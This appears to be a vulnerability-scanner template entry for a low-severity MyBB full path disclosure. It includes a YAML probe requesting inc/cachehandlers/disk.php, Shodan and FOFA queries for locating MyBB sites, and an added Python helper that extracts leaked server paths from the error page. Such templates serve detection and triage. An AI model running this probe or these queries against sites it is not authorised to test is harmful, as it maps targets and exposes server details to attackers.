mybb-full-path-disclosure: MyBB - Full Path Disclosure

Date: 2026-01-16 | Affected software: MyBB | PoC: public

Vulnerability description

MyBB forum software exposes the server's full filesystem path through PHP fatal errors when files that implement interfaces are accessed directly, without their dependencies loaded.

PoC code [public]

id: mybb-full-path-disclosure

info:
  name: MyBB - Full Path Disclosure
  author: 0x_Akoko
  severity: low
  description: |
    Detected MyBB forum software exposed the server's full filesystem path through PHP fatal errors when files that implemented interfaces were accessed without dependencies.
  reference:
    - https://mybb.com/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"MyBB"
    fofa-query: body="Powered by MyBB"
  tags: mybb,misconfig,fpd

http:
  - method: GET
    path:
      - "{{BaseURL}}/inc/cachehandlers/disk.php"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "Uncaught Error")'
        condition: and
# digest: 490a0046304402202450f476ee3692bb373803d065d10df409e65ab02665d5ce052de09a33c7f4630220300ea90e027e2f72736cd0f935af3b7a40f2b9c70eda87d38bb704ecff367b54:922c64590222798bb761d5b6d8e72950
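
For triage of a hit from this template, the following added example (not part of the original template or of MyBB) re-implements the template's two DSL matchers in Python and extracts the filesystem path the error page exposes, so the finding can be confirmed and recorded. The sample response body, its path and interface name are constructed, and all function names are hypothetical.

```python
import html
import re

# Constructed sample of a PHP fatal-error page (html_errors on); the path
# and interface name are illustrative, not taken from a real server.
SAMPLE_BODY = (
    "<br />\n<b>Fatal error</b>:  Uncaught Error: Interface "
    "&quot;ExampleInterface&quot; not found in "
    "/var/www/example/forum/inc/cachehandlers/disk.php:14\n"
    "Stack trace:\n#0 {main}\n  thrown in "
    "<b>/var/www/example/forum/inc/cachehandlers/disk.php</b> "
    "on line <b>14</b><br />\n"
)

PROBED_PATH = "/inc/cachehandlers/disk.php"  # path requested by the template

# Absolute Unix or Windows path ending in .php.
_PATH_RE = re.compile(r"(?:[A-Za-z]:[\\/]|/)[^\s<>\"':]*\.php")


def matches_template(status_code, body):
    """Same condition as the template's DSL matchers (joined with `and`)."""
    return (status_code == 200
            and "Fatal error" in body
            and "Uncaught Error" in body)


def disclosed_paths(body):
    """Return the distinct absolute .php paths in the error text, in order."""
    text = html.unescape(re.sub(r"<[^>]+>", "", body))
    return list(dict.fromkeys(_PATH_RE.findall(text)))


def install_root(path, probed=PROBED_PATH):
    """Directory prefix exposed by the leak, or None if it is another file."""
    normalized = path.replace("\\", "/")
    if normalized.endswith(probed):
        return normalized[: -len(probed)]
    return None


def triage(status_code, body):
    """Summarise a response: did it match, and which paths were exposed?"""
    if not matches_template(status_code, body):
        return {"match": False, "paths": [], "roots": []}
    paths = disclosed_paths(body)
    roots = sorted({r for r in map(install_root, paths) if r})
    return {"match": True, "paths": paths, "roots": roots}
```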
